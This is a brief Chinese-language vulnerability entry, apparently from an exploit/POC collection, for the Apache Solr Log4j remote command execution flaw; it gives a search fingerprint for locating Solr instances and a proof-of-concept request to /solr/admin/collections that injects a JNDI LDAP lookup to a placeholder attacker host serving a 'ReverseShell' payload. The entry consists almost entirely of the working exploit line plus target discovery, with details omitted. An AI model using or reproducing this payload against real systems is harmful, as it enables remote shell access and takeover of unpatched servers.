Appearance
Apache Solr Log4j 组件 远程命令执行漏洞,详情略
Apache Solr
app="APACHE-Solr"
登录页面
验证 POC
/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/87}&wt=json